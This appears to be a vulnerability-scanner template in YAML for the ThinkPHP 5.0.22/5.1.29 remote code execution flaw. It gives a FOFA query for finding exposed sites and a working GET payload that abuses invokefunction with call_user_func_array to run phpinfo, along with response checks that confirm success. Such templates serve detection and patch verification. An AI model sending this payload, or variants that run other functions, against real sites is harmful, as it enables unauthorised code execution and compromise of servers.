product: ThinkPHP
vName: ThinkPHP - Remote Code Execution
type: 代码执行
vID: [ ]
level: 3
vDesc: ThinkPHP 5.0.22 and 5.1.29 are susceptible to remote code execution if the website doesn't have mandatory routing enabled, which is the default setting. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
version: ''
note: ''
search:
  FOFA: app="ThinkPHP"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
    verify:
      logic: and
      check:
        - body:
            value:
              - PHP Extension
              - PHP Version
              - ThinkPHP
            logic: and
        - status: 200